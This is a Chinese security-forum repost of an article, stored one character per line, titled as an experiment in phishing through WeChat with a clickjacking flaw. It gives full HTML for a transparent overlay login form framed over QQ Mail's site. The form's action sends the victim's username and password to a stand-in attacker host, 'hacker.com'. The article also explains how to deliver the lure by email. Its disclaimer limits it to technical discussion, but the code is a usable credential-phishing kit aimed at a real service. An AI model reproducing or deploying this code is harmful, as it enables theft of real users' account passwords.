论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
Web安全
[17093] 2021-07-31_实验使用手机微信配合点击劫持漏洞进行钓鱼
文档创建者:
s7ckTeam
浏览次数:
3
最后更新:
2025-01-18
Web安全
3 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-56
6万
主题
-6万
回帖
-56
积分
管理员
积分
-56
发消息
2021-07-31_实验使用手机微信配合点击劫持漏洞进行钓鱼
实
验
|
使
用
手
机
微
信
配
合
点
击
劫
持
漏
洞
进
行
钓
鱼
原
创
卡
卡
罗
特
_
F
r
e
e
B
u
f
2
0
2
1
-
0
7
-
3
1
前
言
前
言
钓
鱼
攻
击
一
般
指
钓
鱼
式
攻
击
。
钓
鱼
式
攻
击
是
指
企
图
从
电
子
通
讯
中
,
通
过
伪
装
成
信
誉
卓
著
的
法
人
媒
体
以
获
得
如
用
户
名
、
密
码
和
信
用
卡
明
细
等
个
人
敏
感
信
息
的
犯
罪
诈
骗
过
程
。
一
些
网
站
存
在
着
诸
如
h
t
m
l
注
入
、
x
s
s
、
点
击
劫
持
等
漏
洞
,
这
些
漏
洞
因
没
有
实
质
性
的
危
害
往
往
不
被
人
所
重
视
,
本
次
实
验
就
结
合
这
些
漏
洞
来
进
行
一
次
账
号
密
码
恶
意
钓
鱼
,
由
于
技
术
略
菜
,
大
佬
勿
喷
。
*
严
正
声
明
:
本
文
仅
限
于
技
术
讨
论
与
分
享
,
严
禁
用
于
非
法
途
径
。
严
正
声
明
:
本
文
仅
限
于
技
术
讨
论
与
分
享
,
严
禁
用
于
非
法
途
径
。
准
备
准
备
为
了
使
受
害
者
更
加
信
任
,
首
先
需
要
一
个
有
点
击
劫
持
漏
洞
的
网
站
来
配
合
完
成
,
因
为
此
次
实
验
环
境
是
手
机
微
信
的
Q
Q
邮
箱
提
醒
功
能
(
通
过
这
个
功
能
可
直
接
从
手
机
微
信
上
查
看
邮
件
)
,
所
以
就
去
找
找
相
关
的
资
产
,
首
先
找
到
的
是
Q
Q
邮
箱
官
网
,
发
现
可
直
接
被
i
f
r
a
m
e
标
签
嵌
套
进
去
:
表
明
可
利
用
于
点
击
劫
持
,
然
后
继
续
构
造
h
t
m
l
代
码
,
下
一
步
先
需
要
准
备
一
台
v
p
s
,
并
且
开
启
w
e
b
服
务
,
将
写
好
的
点
击
劫
持
文
件
放
在
w
e
b
目
录
。
直
接
上
代
码
:
<
i
f
r
a
m
e
s
r
c
=
"
h
t
t
p
s
:
/
/
m
a
i
l
.
q
q
.
c
o
m
/
"
>
<
/
i
f
r
a
m
e
>
<
!
D
O
C
T
Y
P
E
h
t
m
l
>
<
h
t
m
l
>
<
h
e
a
d
>
<
m
e
t
a
h
t
t
p
-
e
q
u
i
v
=
"
C
o
n
t
e
n
t
-
T
y
p
e
"
c
o
n
t
e
n
t
=
"
t
e
x
t
/
h
t
m
l
;
c
h
a
r
s
e
t
=
u
t
f
-
8
"
/
>
<
t
i
t
l
e
>
<
/
t
i
t
l
e
>
<
/
h
e
a
d
>
<
b
o
d
y
>
<
d
i
v
s
t
y
l
e
=
"
w
i
d
t
h
:
3
0
0
p
x
;
h
e
i
g
h
t
:
2
0
0
p
x
;
p
o
s
i
t
i
o
n
:
a
b
s
o
l
u
t
e
;
t
o
p
:
5
0
%
;
l
e
f
t
:
5
0
%
;
t
r
a
n
s
f
o
r
m
:
t
r
a
n
s
l
a
t
e
(
-
5
0
%
,
-
5
0
%
)
"
>
<
f
o
r
m
n
a
m
e
=
"
l
o
g
i
n
"
a
c
t
i
o
n
=
"
h
t
t
p
:
/
/
h
a
c
k
e
r
.
c
o
m
/
1
.
h
t
m
l
"
>
<
i
n
p
u
t
s
t
y
l
e
=
"
w
i
d
t
h
:
2
8
6
p
x
;
h
e
i
g
h
t
:
4
0
p
x
;
"
t
y
p
e
=
"
t
e
x
t
"
n
a
m
e
=
"
u
s
e
r
n
a
m
e
"
/
>
<
b
r
/
>
<
i
n
p
u
t
s
t
y
l
e
=
"
w
i
d
t
h
:
2
8
6
p
x
;
h
e
i
g
h
t
:
4
0
p
x
;
"
t
y
p
e
=
"
t
e
x
t
"
n
a
m
e
=
"
p
a
s
s
w
o
r
d
"
/
>
<
b
r
/
>
<
b
r
/
>
将
上
述
代
码
保
存
为
l
o
g
i
n
.
h
t
m
l
文
件
放
在
w
e
b
目
录
,
需
要
注
意
的
是
s
t
y
l
e
需
要
根
据
实
际
情
况
调
整
,
o
p
a
c
i
t
y
一
会
要
设
置
为
0
,
先
看
下
效
果
:
O
K
,
钓
鱼
页
面
就
先
构
造
成
这
样
,
然
后
构
造
主
页
面
,
就
是
受
害
者
访
问
所
看
到
的
页
面
,
直
接
上
代
码
:
第
一
个
i
f
r
a
m
e
标
签
里
是
真
正
的
Q
Q
邮
箱
页
面
,
第
二
个
是
钓
鱼
页
面
,
将
钓
鱼
页
面
放
在
第
二
个
是
因
为
,
经
测
试
浏
览
器
会
优
先
加
载
最
后
一
个
i
f
r
a
m
e
标
签
,
第
一
个
只
是
可
以
看
到
不
能
进
行
任
何
操
作
,
现
将
o
p
a
c
i
t
y
设
置
0
.
5
看
下
效
果
:
<
b
r
/
>
<
b
r
/
>
<
b
r
/
>
<
i
n
p
u
t
s
t
y
l
e
=
"
w
i
d
t
h
:
2
8
6
p
x
;
h
e
i
g
h
t
:
4
0
p
x
;
o
p
a
c
i
t
y
:
0
.
5
"
t
y
p
e
=
"
s
u
b
m
i
t
"
v
a
l
u
e
=
"
"
/
>
<
/
f
o
r
m
>
<
/
d
i
v
>
<
/
b
o
d
y
>
<
/
h
t
m
l
>
<
h
t
m
l
>
<
h
e
a
d
>
<
t
i
t
l
e
>
登
陆
<
/
t
i
t
l
e
>
<
/
h
e
a
d
>
<
b
o
d
y
>
<
i
f
r
a
m
e
s
r
c
=
"
h
t
t
p
s
:
/
/
m
a
i
l
.
q
q
.
c
o
m
/
"
s
t
y
l
e
=
"
w
i
d
t
h
:
1
4
4
0
p
x
;
h
e
i
g
h
t
:
9
0
0
p
x
;
p
o
s
i
t
i
o
n
:
a
b
s
o
l
u
t
e
;
t
o
p
:
-
0
p
x
;
l
e
f
t
:
-
0
p
x
;
o
p
a
c
i
t
y
:
1
;
"
>
<
/
i
f
r
a
m
e
>
<
i
f
r
a
m
e
s
r
c
=
"
h
t
t
p
:
/
/
h
a
c
k
e
r
.
c
o
m
/
l
o
g
i
n
.
h
t
m
l
"
s
t
y
l
e
=
"
w
i
d
t
h
:
6
4
0
p
x
;
h
e
i
g
h
t
:
6
4
0
p
x
;
p
o
s
i
t
i
o
n
:
a
b
s
o
l
u
t
e
;
t
o
p
:
-
0
;
l
e
f
t
:
7
0
0
p
x
;
o
p
a
c
i
t
y
:
1
;
"
>
<
/
i
f
r
a
m
e
>
<
/
b
o
d
y
>
<
/
h
t
m
l
>
将
o
p
a
c
i
t
y
设
为
0
的
话
,
按
钮
就
会
彻
底
透
明
,
点
击
登
陆
时
会
被
钓
鱼
。
代
码
写
的
确
实
不
精
湛
,
无
所
谓
,
实
现
功
能
才
是
这
次
的
目
的
,
当
受
害
者
输
入
账
号
密
码
点
击
登
陆
时
,
其
实
点
击
的
是
我
们
构
造
的
钓
鱼
页
面
,
在
第
一
段
代
码
中
我
们
构
造
了
一
个
登
陆
g
e
t
请
求
表
单
,
当
受
害
者
提
交
登
陆
请
求
的
时
候
实
际
上
的
操
作
为
/
1
.
h
t
m
l
?
u
s
e
r
n
a
m
e
=
x
x
x
&
p
a
s
s
w
o
r
d
=
x
x
x
而
参
数
会
记
录
在
日
志
中
,
这
样
就
可
以
窃
取
远
程
受
害
者
的
输
入
内
容
:
第
二
段
实
际
上
是
点
击
劫
持
漏
洞
利
用
,
利
用
视
觉
上
的
欺
骗
进
行
劫
持
操
作
:
在
测
试
中
发
现
手
机
访
问
的
时
候
并
不
是
h
t
t
p
s
:
/
/
m
a
i
l
.
q
q
.
c
o
m
这
个
域
名
,
而
手
机
网
页
版
的
地
址
是
:
h
t
t
p
s
:
/
/
w
.
m
a
i
l
.
q
q
.
c
o
m
,
最
终
代
码
为
:
漏
洞
利
用
漏
洞
利
用
终
于
来
到
了
漏
洞
利
用
,
偶
然
间
发
现
如
果
直
接
发
送
测
试
h
t
m
l
代
码
,
微
信
的
Q
Q
邮
箱
会
解
析
:
查
看
邮
件
发
现
已
经
解
析
,
虽
然
没
有
写
提
交
参
数
,
但
是
a
c
t
i
o
n
属
性
涉
及
到
跨
域
的
问
题
往
往
无
法
直
接
访
问
指
定
的
U
R
L
,
所
以
这
里
也
没
有
实
质
性
的
危
害
。
然
后
发
送
准
备
好
的
社
工
邮
件
,
邮
件
主
题
这
段
话
可
以
忽
略
不
看
,
不
是
此
次
实
验
的
重
点
~
~
:
从
微
信
上
查
看
邮
件
我
们
假
设
当
人
员
安
全
意
识
较
低
时
会
点
击
按
钮
这
里
进
入
了
网
页
版
,
一
般
能
进
网
页
版
绝
对
不
下
载
,
进
来
之
后
大
体
上
和
原
始
页
面
没
啥
区
别
的
(
代
码
能
力
有
限
,
还
请
见
谅
)
这
是
钓
鱼
页
面
:
以
下
为
真
正
的
页
面
:
然
后
实
验
继
续
,
输
入
账
号
密
码
:
可
以
看
到
真
正
请
求
的
是
之
前
建
立
的
l
o
g
i
n
.
h
t
m
l
,
也
就
是
/
1
.
h
t
m
l
?
u
s
e
r
n
a
m
e
=
x
x
x
&
p
a
s
s
w
o
r
d
=
x
x
x
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
Web安全